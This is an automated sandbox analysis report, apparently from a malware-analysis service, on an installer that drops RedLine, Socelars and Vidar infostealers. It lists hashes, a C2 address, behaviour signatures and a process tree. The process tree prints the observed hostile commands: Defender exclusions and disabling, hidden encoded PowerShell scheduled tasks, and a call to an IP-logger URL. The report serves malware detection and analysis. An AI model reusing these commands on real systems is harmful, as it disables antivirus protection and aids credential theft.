Analysis

  • max time kernel
    1803s
  • max time network
    1802s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    18-09-2021 21:25

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.3MB

  • MD5

    c9b742fa61ccc9b3afa7217f3bfe2590

  • SHA1

    7c1ddc294d0d9214c1e07ba239d24ffd2a01854d

  • SHA256

    5967f1aef118ddfcd1d14d5cf3f29a62a845052c9ed9ce91587c0015b1047c58

  • SHA512

    27b326724da58f967c49eb0f889af63636b2f7e49b1356bf76677fcc419f8eca41eb8f2fbddc4599f1f3e83fffa6a98a2b74315857f909d78254d4083c381f99

Malware Config

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 26 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 44 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 35 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 18 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Drops file in Windows directory 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 45 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 4 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3552
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4780
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3524
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4164
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sat20ecdfe3ee79f.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3528
          • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20ecdfe3ee79f.exe
            Sat20ecdfe3ee79f.exe
            5⤵
            • Executes dropped EXE
            PID:3748
            • C:\Users\Admin\Documents\vGjPBrntpoqDW5Fw9L47gEoc.exe
              "C:\Users\Admin\Documents\vGjPBrntpoqDW5Fw9L47gEoc.exe"
              6⤵
              • Executes dropped EXE
              PID:6040
            • C:\Users\Admin\Documents\Qe7_6jGBbmEusoI6Z1m7NN9p.exe
              "C:\Users\Admin\Documents\Qe7_6jGBbmEusoI6Z1m7NN9p.exe"
              6⤵
              • Executes dropped EXE
              PID:5060
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                7⤵
                  PID:5248
              • C:\Users\Admin\Documents\bM1lAK9_6qrDWhAvQCLFWrBk.exe
                "C:\Users\Admin\Documents\bM1lAK9_6qrDWhAvQCLFWrBk.exe"
                6⤵
                • Executes dropped EXE
                PID:5144
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 240
                  7⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:2264
              • C:\Users\Admin\Documents\magaTnk_A4jqEFJV8eORLHQK.exe
                "C:\Users\Admin\Documents\magaTnk_A4jqEFJV8eORLHQK.exe"
                6⤵
                • Executes dropped EXE
                PID:6092
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 240
                  7⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5788
              • C:\Users\Admin\Documents\s6pnBFURtpRt_98USqtnaTCv.exe
                "C:\Users\Admin\Documents\s6pnBFURtpRt_98USqtnaTCv.exe"
                6⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:5164
              • C:\Users\Admin\Documents\LKTftM5cJoptCgINSoW0ED8Q.exe
                "C:\Users\Admin\Documents\LKTftM5cJoptCgINSoW0ED8Q.exe"
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                PID:5168
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                  7⤵
                  • Creates scheduled task(s)
                  PID:6976
                • C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
                  "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
                  7⤵
                    PID:1792
                    • C:\Users\Admin\Documents\lKyOf4nGgv7xYctM1LvW5lx5.exe
                      "C:\Users\Admin\Documents\lKyOf4nGgv7xYctM1LvW5lx5.exe"
                      8⤵
                        PID:5296
                      • C:\Users\Admin\Documents\6TS6ei5M6qr67jBGWuixy3zm.exe
                        "C:\Users\Admin\Documents\6TS6ei5M6qr67jBGWuixy3zm.exe"
                        8⤵
                          PID:6520
                          • C:\Users\Admin\AppData\Local\Temp\7zS27A2.tmp\Install.exe
                            .\Install.exe
                            9⤵
                              PID:3528
                              • C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe
                                .\Install.exe /S /site_id "668658"
                                10⤵
                                • Checks BIOS information in registry
                                • Enumerates connected drives
                                • Drops file in System32 directory
                                • Enumerates system info in registry
                                PID:1480
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                  11⤵
                                    PID:6844
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                      12⤵
                                        PID:3136
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                          13⤵
                                            PID:1516
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                              14⤵
                                                PID:4360
                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                  15⤵
                                                    PID:6148
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                              12⤵
                                                PID:9452
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                  13⤵
                                                    PID:9544
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                      14⤵
                                                        PID:9736
                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                          15⤵
                                                            PID:11220
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                      12⤵
                                                        PID:11908
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                          13⤵
                                                            PID:11940
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                              14⤵
                                                                PID:12072
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                  15⤵
                                                                    PID:6676
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                              12⤵
                                                                PID:7500
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                  13⤵
                                                                    PID:7540
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                      14⤵
                                                                        PID:7784
                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                          15⤵
                                                                            PID:6516
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                    11⤵
                                                                      PID:6552
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                        12⤵
                                                                          PID:2184
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                            13⤵
                                                                              PID:5400
                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                              13⤵
                                                                                PID:6708
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                            11⤵
                                                                              PID:1716
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                12⤵
                                                                                  PID:4328
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                    13⤵
                                                                                      PID:1456
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                      13⤵
                                                                                        PID:5076
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "gzRAcrBGo" /SC once /ST 09:36:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                    11⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:5476
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 14:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\HcqbKbT.exe\" W8 /site_id 668658 /S" /V1 /F
                                                                                    11⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4692
                                                                            • C:\Users\Admin\Documents\rqTLrt6ooAYbGkY2aAhbYxPP.exe
                                                                              "C:\Users\Admin\Documents\rqTLrt6ooAYbGkY2aAhbYxPP.exe"
                                                                              8⤵
                                                                                PID:5324
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 240
                                                                                  9⤵
                                                                                  • Program crash
                                                                                  • Checks processor information in registry
                                                                                  • Enumerates system info in registry
                                                                                  PID:6004
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                              7⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:6404
                                                                          • C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe
                                                                            "C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5340
                                                                            • C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe
                                                                              C:\Users\Admin\Documents\NWXu0OucddIThdb5Qplybmke.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:6188
                                                                          • C:\Users\Admin\Documents\JbYLmYkiL5oh_BFQXzN1N2aA.exe
                                                                            "C:\Users\Admin\Documents\JbYLmYkiL5oh_BFQXzN1N2aA.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:6036
                                                                          • C:\Users\Admin\Documents\82ccQYnRwSkZfpeuxGHOYtVJ.exe
                                                                            "C:\Users\Admin\Documents\82ccQYnRwSkZfpeuxGHOYtVJ.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4288
                                                                          • C:\Users\Admin\Documents\9YsDhPL0CFb8u51TEbNMNQPm.exe
                                                                            "C:\Users\Admin\Documents\9YsDhPL0CFb8u51TEbNMNQPm.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:4140
                                                                          • C:\Users\Admin\Documents\gRPQnJhorUeOOxV8vnDmDfPK.exe
                                                                            "C:\Users\Admin\Documents\gRPQnJhorUeOOxV8vnDmDfPK.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4784
                                                                          • C:\Users\Admin\Documents\qFlx4UH2YUQ4dqR4Wrkd4DnA.exe
                                                                            "C:\Users\Admin\Documents\qFlx4UH2YUQ4dqR4Wrkd4DnA.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Checks whether UAC is enabled
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:572
                                                                          • C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe
                                                                            "C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:588
                                                                            • C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe
                                                                              "C:\Users\Admin\Documents\fOdOVTJ4cAdpEqSN_u_aeghQ.exe"
                                                                              7⤵
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:6944
                                                                          • C:\Users\Admin\Documents\x3NgCE44wh3S1__Hyb5PvqVl.exe
                                                                            "C:\Users\Admin\Documents\x3NgCE44wh3S1__Hyb5PvqVl.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            PID:5132
                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Checks whether UAC is enabled
                                                                              • Drops file in Program Files directory
                                                                              PID:5960
                                                                            • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5608
                                                                            • C:\Program Files (x86)\Company\NewProduct\cm3.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5972
                                                                          • C:\Users\Admin\Documents\u7WmSWxlHGRHf4l8vPpMvpUY.exe
                                                                            "C:\Users\Admin\Documents\u7WmSWxlHGRHf4l8vPpMvpUY.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4280
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 256
                                                                              7⤵
                                                                              • Program crash
                                                                              • Checks processor information in registry
                                                                              • Enumerates system info in registry
                                                                              PID:5180
                                                                          • C:\Users\Admin\Documents\asCr7xkj3vPL813Pivuf3qJz.exe
                                                                            "C:\Users\Admin\Documents\asCr7xkj3vPL813Pivuf3qJz.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:1656
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                              7⤵
                                                                                PID:4996
                                                                                • C:\Users\Admin\AppData\Local\Temp\f.exe
                                                                                  "f.exe"
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6540
                                                                                • C:\Users\Admin\AppData\Local\Temp\wwi.exe
                                                                                  "wwi.exe"
                                                                                  8⤵
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:6728
                                                                                • C:\Users\Admin\AppData\Local\Temp\wwl.exe
                                                                                  "wwl.exe"
                                                                                  8⤵
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:7008
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"
                                                                                  8⤵
                                                                                  • Blocklisted process makes network request
                                                                                  PID:6320
                                                                            • C:\Users\Admin\Documents\_eFGDGYkyZFPd0GWkch8P7Fe.exe
                                                                              "C:\Users\Admin\Documents\_eFGDGYkyZFPd0GWkch8P7Fe.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:1408
                                                                            • C:\Users\Admin\Documents\W7aNRfk1wBRZpenTZJTDXqd2.exe
                                                                              "C:\Users\Admin\Documents\W7aNRfk1wBRZpenTZJTDXqd2.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:3060
                                                                            • C:\Users\Admin\Documents\cy3BD8IMClWAp4Sb5SGnjwsu.exe
                                                                              "C:\Users\Admin\Documents\cy3BD8IMClWAp4Sb5SGnjwsu.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2416
                                                                            • C:\Users\Admin\Documents\sE6oyYqka7gpVuUPduXmrRUI.exe
                                                                              "C:\Users\Admin\Documents\sE6oyYqka7gpVuUPduXmrRUI.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:5140
                                                                              • C:\Users\Admin\AppData\Roaming\3464864.scr
                                                                                "C:\Users\Admin\AppData\Roaming\3464864.scr" /S
                                                                                7⤵
                                                                                  PID:1712
                                                                                • C:\Users\Admin\AppData\Roaming\5847552.scr
                                                                                  "C:\Users\Admin\AppData\Roaming\5847552.scr" /S
                                                                                  7⤵
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:5232
                                                                                • C:\Users\Admin\AppData\Roaming\7470814.scr
                                                                                  "C:\Users\Admin\AppData\Roaming\7470814.scr" /S
                                                                                  7⤵
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:4600
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c Sat20578e6239.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:4288
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20578e6239.exe
                                                                              Sat20578e6239.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:4548
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c Sat2071d99516dc03841.exe
                                                                            4⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3848
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2071d99516dc03841.exe
                                                                              Sat2071d99516dc03841.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4856
                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5924
                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\tmpD12A_tmp.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6080
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c Sat20fbae42a4.exe
                                                                            4⤵
                                                                              PID:3956
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20fbae42a4.exe
                                                                                Sat20fbae42a4.exe
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:3948
